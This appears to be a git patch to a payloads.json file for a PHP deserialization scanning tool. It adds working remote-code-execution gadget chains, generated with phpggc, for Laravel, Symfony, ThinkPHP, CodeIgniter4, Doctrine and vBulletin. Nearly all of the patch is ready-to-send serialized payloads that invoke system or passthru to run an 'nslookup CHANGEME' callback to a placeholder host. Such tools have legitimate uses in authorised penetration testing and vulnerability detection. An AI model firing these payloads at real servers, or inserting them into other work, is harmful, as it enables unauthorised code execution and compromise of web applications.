From 112398bab741f97d810730074eb5b3419cdecb2c Mon Sep 17 00:00:00 2001 From: Ricardo Date: Thu, 23 Feb 2023 22:40:50 +0000 Subject: [PATCH] Update payloads.json # Add/Update: Doctrine RCE1 CodeIgniter4 RCE1 Laravel RCE13 Laravel RCE14 Laravel RCE15 Laravel RCE16 Symfony RCE7 ThinkPHP RCE3 ThinkPHP RCE4 vBulletin RCE1 --- res/payloads.json | 58 +++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 53 insertions(+), 5 deletions(-) diff --git a/res/payloads.json b/res/payloads.json index 6a9262b..44ec52a 100644 --- a/res/payloads.json +++ b/res/payloads.json @@ -21,7 +21,7 @@ "_needs_dynamic_payload_editing": false, "name": "CodeIgniter 4.0.0-beta.1 <= ? (1)", "gen_with": "./phpggc CodeIgniter4/RCE1 ", - "payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":5:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":0:{}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:2:\"id\"%3Ba:1:{s:5:\"rules\"%3Ba:1:{i:0%3Bs:6:\"system\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}}s:10:\"%00*%00lockKey\"%3Bs:63:\"nslookup CHANGEME\"%3B}}" + "payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":5:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":0:{}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:2:\"id\"%3Ba:1:{s:5:\"rules\"%3Ba:1:{i:0%3Bs:8:\"passthru\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}}s:10:\"%00*%00lockKey\"%3Bs:63:\"nslookup CHANGEME\"%3B}}" }, { "_needs_dynamic_payload_editing": false, @@ -69,7 +69,7 @@ "_needs_dynamic_payload_editing": false, "name": "Doctrine/RCE1 1.5.1 <= 2.7.2", "gen_with": "./phpggc Doctrine/RCE1 ", - "payload": "8.1.12a:4:{i:1000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:99999999999999999%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:71:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MockFileSessionStorage\":5:{s:7:\"started\"%3Bb:1%3Bs:8:\"savePath\"%3Bs:4:\"/tmp\"%3Bs:2:\"id\"%3Bs:3:\"aaa\"%3Bs:4:\"data\"%3Ba:1:{i:0%3Bs:85:\"\"%3B}s:11:\"metadataBag\"%3BO:60:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MetadataBag\":1:{s:10:\"storageKey\"%3Bs:1:\"a\"%3B}}}i:1000%3Bi:1%3Bi:2000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:0%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:44:\"Symfony\\Component\\Cache\\Adapter\\ProxyAdapter\":1:{s:4:\"pool\"%3BO:47:\"Symfony\\Component\\Cache\\Adapter\\PhpArrayAdapter\":1:{s:4:\"file\"%3Bs:17:\"/tmp/aaa.mocksess\"%3B}}}i:2000%3Bi:1%3B}" + "payload": "a:4:{i:1000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:99999999999999999%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:71:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MockFileSessionStorage\":5:{s:7:\"started\"%3Bb:1%3Bs:8:\"savePath\"%3Bs:4:\"/tmp\"%3Bs:2:\"id\"%3Bs:3:\"aaa\"%3Bs:4:\"data\"%3Ba:1:{i:0%3Bs:85:\"\"%3B}s:11:\"metadataBag\"%3BO:60:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MetadataBag\":1:{s:10:\"storageKey\"%3Bs:1:\"a\"%3B}}}i:1000%3Bi:1%3Bi:2000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:0%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:47:\"Symfony\\Component\\Cache\\Adapter\\PhpArrayAdapter\":1:{s:4:\"file\"%3Bs:17:\"/tmp/aaa.mocksess\"%3B}}i:2000%3Bi:1%3B}" }, { "_needs_dynamic_payload_editing": false, @@ -161,6 +161,30 @@ "gen_with": "./phpggc Laravel/RCE12 ", "payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:60:\"Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider\":1:{s:6:\"%00*%00app\"%3BO:23:\"Illuminate\\View\\Factory\":1:{s:9:\"%00*%00finder\"%3BO:37:\"Symfony\\Component\\Console\\Application\":3:{s:50:\"%00Symfony\\Component\\Console\\Application%00initialized\"%3Bb:1%3Bs:47:\"%00Symfony\\Component\\Console\\Application%00commands\"%3Ba:1:{i:0%3BO:33:\"Illuminate\\Foundation\\AliasLoader\":1:{s:10:\"%00*%00aliases\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}}}s:52:\"%00Symfony\\Component\\Console\\Application%00commandLoader\"%3BO:27:\"Illuminate\\Cache\\Repository\":1:{s:8:\"%00*%00store\"%3BO:20:\"PhpOption\\LazyOption\":3:{s:28:\"%00PhpOption\\LazyOption%00option\"%3BN%3Bs:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:6:\"system\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}}}}" }, + { + "_needs_dynamic_payload_editing": false, + "name": "Laravel ??? (13)", + "gen_with": "./phpggc Laravel/RCE13 ", + "payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:35:\"Illuminate\\Database\\DatabaseManager\":2:{s:6:\"%00*%00app\"%3Ba:1:{s:6:\"config\"%3Ba:2:{s:16:\"database.default\"%3Bs:8:\"passthru\"%3Bs:20:\"database.connections\"%3Ba:1:{s:8:\"passthru\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}s:13:\"%00*%00extensions\"%3Ba:1:{s:8:\"passthru\"%3Bs:12:\"array_filter\"%3B}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Laravel ??? (14)", + "gen_with": "./phpggc Laravel/RCE14 ", + "payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:20:\"Faker\\ValidGenerator\":3:{s:12:\"%00*%00generator\"%3BO:22:\"Faker\\DefaultGenerator\":1:{s:10:\"%00*%00default\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:13:\"%00*%00maxRetries\"%3Bi:1%3Bs:12:\"%00*%00validator\"%3Bs:8:\"passthru\"%3B}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Laravel ??? (15)", + "gen_with": "./phpggc Laravel/RCE15 ", + "payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:29:\"Illuminate\\Queue\\QueueManager\":2:{s:6:\"%00*%00app\"%3Ba:1:{s:6:\"config\"%3Ba:2:{s:13:\"queue.default\"%3Bs:3:\"key\"%3Bs:21:\"queue.connections.key\"%3Ba:1:{s:6:\"driver\"%3Bs:4:\"func\"%3B}}}s:13:\"%00*%00connectors\"%3Ba:1:{s:4:\"func\"%3Ba:2:{i:0%3BO:28:\"Illuminate\\Auth\\RequestGuard\":3:{s:11:\"%00*%00callback\"%3Bs:14:\"call_user_func\"%3Bs:10:\"%00*%00request\"%3Bs:8:\"passthru\"%3Bs:11:\"%00*%00provider\"%3Bs:63:\"nslookup CHANGEME\"%3B}i:1%3Bs:4:\"user\"%3B}}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Laravel ??? (16)", + "gen_with": "./phpggc Laravel/RCE17 ", + "payload": "O:35:\"Monolog\\Handler\\RotatingFileHandler\":4:{s:13:\"%00*%00mustRotate\"%3Bb:1%3Bs:11:\"%00*%00filename\"%3Bs:8:\"anything\"%3Bs:17:\"%00*%00filenameFormat\"%3BO:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{s:9:\"condition\"%3Ba:2:{i:0%3BO:28:\"Illuminate\\Auth\\RequestGuard\":3:{s:11:\"%00*%00callback\"%3Bs:14:\"call_user_func\"%3Bs:10:\"%00*%00request\"%3Bs:8:\"passthru\"%3Bs:11:\"%00*%00provider\"%3Bs:63:\"nslookup CHANGEME\"%3B}i:1%3Bs:4:\"user\"%3B}}s:13:\"%00*%00dateFormat\"%3Bs:1:\"l\"%3B}" + }, { "_needs_dynamic_payload_editing": false, "name": "Spiral 2.7.0 <= 2.8.13 (1)", @@ -289,16 +313,34 @@ }, { "_needs_dynamic_payload_editing": false, - "name": "ThinkPHP 5.1.x-5.2.x", + "name": "Symfony ??? (7)", + "gen_with": "./phpggc Symfony/RCE7 ", + "payload": "O:47:\"Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter\":2:{s:57:\"%00Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter%00deferred\"%3Bs:63:\"nslookup CHANGEME\"%3Bs:61:\"%00Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter%00getTagsByKey\"%3Bs:8:\"passthru\"%3B}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "ThinkPHP 5.1.x-5.2.x (1)", "gen_with": "./phpggc ThinkPHP/RCE1 ", "payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":3:{s:17:\"%00think\\Model%00data\"%3Ba:1:{s:5:\"smi1e\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:21:\"%00think\\Model%00withAttr\"%3Ba:1:{s:5:\"smi1e\"%3Bs:6:\"system\"%3B}s:9:\"%00*%00append\"%3Ba:1:{s:5:\"smi1e\"%3Bs:1:\"1\"%3B}}}}" }, { "_needs_dynamic_payload_editing": false, - "name": "ThinkPHP 5.0.24", - "gen_with": "./phpggc ThinkPHP/RCE1 ", + "name": "ThinkPHP 5.0.24 (2)", + "gen_with": "./phpggc ThinkPHP/RCE2 ", "payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":5:{s:9:\"%00*%00append\"%3Ba:1:{i:0%3Bs:8:\"getError\"%3B}s:8:\"%00*%00error\"%3BO:27:\"think\\model\\relation\\HasOne\":3:{s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENSno<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}s:11:\"%00*%00bindAttr\"%3Ba:2:{i:0%3Bs:2:\"no\"%3Bi:1%3Bs:3:\"123\"%3B}}s:9:\"%00*%00parent\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENSno<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENSno<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}}}}" }, + { + "_needs_dynamic_payload_editing": false, + "name": "ThinkPHP ??? (3)", + "gen_with": "./phpggc ThinkPHP/RCE3 ", + "payload": "O:41:\"League\\Flysystem\\Cached\\Storage\\Psr6Cache\":3:{s:47:\"%00League\\Flysystem\\Cached\\Storage\\Psr6Cache%00pool\"%3BO:26:\"League\\Flysystem\\Directory\":2:{s:13:\"%00*%00filesystem\"%3BO:26:\"League\\Flysystem\\Directory\":2:{s:13:\"%00*%00filesystem\"%3BO:14:\"think\\Validate\":1:{s:7:\"%00*%00type\"%3Ba:1:{s:3:\"key\"%3Bs:8:\"passthru\"%3B}}s:7:\"%00*%00path\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:7:\"%00*%00path\"%3Bs:3:\"key\"%3B}s:11:\"%00*%00autosave\"%3Bb:0%3Bs:6:\"%00*%00key\"%3Ba:1:{i:0%3Bs:8:\"anything\"%3B}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "ThinkPHP ??? (4)", + "gen_with": "./phpggc ThinkPHP/RCE4 ", + "payload": "O:17:\"think\\model\\Pivot\":9:{s:19:\"%00think\\Model%00exists\"%3Bb:1%3Bs:18:\"%00think\\Model%00force\"%3Bb:1%3Bs:21:\"%00think\\Model%00lazySave\"%3Bb:1%3Bs:9:\"%00*%00suffix\"%3BO:17:\"think\\model\\Pivot\":9:{s:19:\"%00think\\Model%00exists\"%3BN%3Bs:18:\"%00think\\Model%00force\"%3BN%3Bs:21:\"%00think\\Model%00lazySave\"%3BN%3Bs:9:\"%00*%00suffix\"%3BN%3Bs:17:\"%00think\\Model%00data\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:63:\"nslookup CHANGEME\"%3B}}s:21:\"%00think\\Model%00withAttr\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:8:\"passthru\"%3B}}s:7:\"%00*%00json\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}s:12:\"%00*%00jsonAssoc\"%3Bb:1%3Bs:12:\"%00*%00withEvent\"%3BN%3B}s:17:\"%00think\\Model%00data\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:63:\"nslookup CHANGEME\"%3B}}s:21:\"%00think\\Model%00withAttr\"%3BN%3Bs:7:\"%00*%00json\"%3BN%3Bs:12:\"%00*%00jsonAssoc\"%3BN%3Bs:12:\"%00*%00withEvent\"%3Bb:0%3B}" + }, { "_needs_dynamic_payload_editing": false, "name": "WordPress/Dompdf/RCE1 <= 0.8.5+ (1)", @@ -449,5 +491,11 @@ "name": "PHPSecLib 2.0.0 <= 2.0.34 (1)", "gen_with": "./phpggc PHPSecLib/RCE1 ", "payload": "a:1:{i:0%3BO:18:\"phpseclib\\Net\\SSH1\":2:{s:6:\"bitmap\"%3Bi:1%3Bs:6:\"crypto\"%3BO:19:\"phpseclib\\Crypt\\AES\":8:{s:6:\"bitmap\"%3Bi:1%3Bs:6:\"crypto\"%3Bi:1%3Bs:10:\"block_size\"%3BN%3Bs:12:\"inline_crypt\"%3Ba:2:{i:0%3BO:25:\"phpseclib\\Crypt\\TripleDES\":6:{s:10:\"block_size\"%3Bs:113:\"1){}}}%3B ob_clean()%3Bpassthru('nslookup CHANGEME')%3Bdie()%3B ?>\"%3Bs:12:\"inline_crypt\"%3BN%3Bs:16:\"use_inline_crypt\"%3Bi:1%3Bs:7:\"changed\"%3Bi:0%3Bs:6:\"engine\"%3Bi:1%3Bs:4:\"mode\"%3Bi:1%3B}i:1%3Bs:26:\"_createInlineCryptFunction\"%3B}s:16:\"use_inline_crypt\"%3Bi:1%3Bs:7:\"changed\"%3Bi:0%3Bs:6:\"engine\"%3Bi:1%3Bs:4:\"mode\"%3Bi:1%3B}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "vBulletin ??? (1)", + "gen_with": "./phpggc vBulletin/RCE1 ", + "payload": "a:2:{i:0%3BO:27:\"googlelogin_vendor_autoload\":0:{}i:1%3BO:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"%00*%00socket\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3Br:4%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:63:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:8:\"passthru\"%3B}}}}" } ]